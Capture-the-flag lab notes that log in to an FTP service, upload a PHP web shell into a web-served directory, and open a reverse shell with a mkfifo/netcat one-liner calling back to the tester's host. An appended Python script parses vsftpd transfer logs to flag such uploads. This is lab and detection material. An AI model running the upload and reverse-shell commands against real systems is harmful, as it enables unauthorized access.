6 :21 ftp

$ pftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:kashz): developer
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir
227 Entering Passive Mode (10,10,10,197,159,7).
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Jun 30  2020 dev
226 Directory send OK.

# can write to it
ftp> cd dev
250 Directory successfully changed.
ftp> put php/web.php web.php
local: php/web.php remote: web.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
7205 bytes sent in 0.00 secs (152.6938 MB/s)

# file loads but is deleted within a few seconds.
# tried overwriting index.php => failed.

# cheap trick
ftp> put php/web.php web.php
# load the webpage
# use shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.7 6969 >/tmp/f
# re-upload the shell and then just execute the file

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 39070
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sneakymailer
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
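
Detection side of the session above, as an added example that is not part of the original notes: a script file written over FTP into a web-served directory, then written again seconds later, stands out in the FTP transfer log. The sketch assumes vsftpd logs in standard xferlog format (`xferlog_std_format=YES`); the log lines, extension list and 60-second window are constructed for illustration.

```python
# Added example (not from the original notes): flag script uploads in a
# vsftpd transfer log written in standard xferlog format.
from datetime import datetime

SCRIPT_EXTS = (".php", ".phtml", ".phar")  # assumption: types the web server executes
REUPLOAD_WINDOW = 60                       # assumption: seconds between repeat uploads

# Constructed sample lines; only the addresses, user and file name mirror the session.
SAMPLE_LOG = """\
Tue Jun 30 10:00:01 2020 1 10.10.16.7 7205 /dev/web.php b _ i r developer ftp 0 * c
Tue Jun 30 10:00:20 2020 1 10.10.16.7 7205 /dev/web.php b _ i r developer ftp 0 * c
Tue Jun 30 10:05:00 2020 1 10.10.16.9 512 /dev/notes.txt b _ i r developer ftp 0 * c
Tue Jun 30 10:06:00 2020 1 10.10.16.9 900 /dev/index.php b _ o r developer ftp 0 * c
"""

def parse_xferlog(line):
    """Split one xferlog line into the fields used below, or return None."""
    f = line.split()
    if len(f) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(f[0:5]), "%a %b %d %H:%M:%S %Y")
        size = int(f[7])
    except ValueError:
        return None
    return {"time": when, "host": f[6], "size": size, "path": f[8],
            "direction": f[11], "user": f[13], "status": f[17]}

def suspicious_uploads(log_text):
    """Return (time, user, host, path, reason) for each completed script upload."""
    findings, last_seen = [], {}
    for line in log_text.splitlines():
        rec = parse_xferlog(line)
        if rec is None or rec["direction"] != "i" or rec["status"] != "c":
            continue  # keep only completed incoming transfers
        if not rec["path"].lower().endswith(SCRIPT_EXTS):
            continue
        key = (rec["user"], rec["path"])
        prev = last_seen.get(key)
        repeat = prev is not None and (rec["time"] - prev).total_seconds() <= REUPLOAD_WINDOW
        reason = "script re-uploaded within window" if repeat else "script uploaded"
        findings.append((rec["time"].isoformat(), rec["user"], rec["host"], rec["path"], reason))
        last_seen[key] = rec["time"]
    return findings

if __name__ == "__main__":
    for finding in suspicious_uploads(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Removing PHP execution from the FTP-writable directory, or the FTP account's write access to it, closes the path that this log check only reports.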
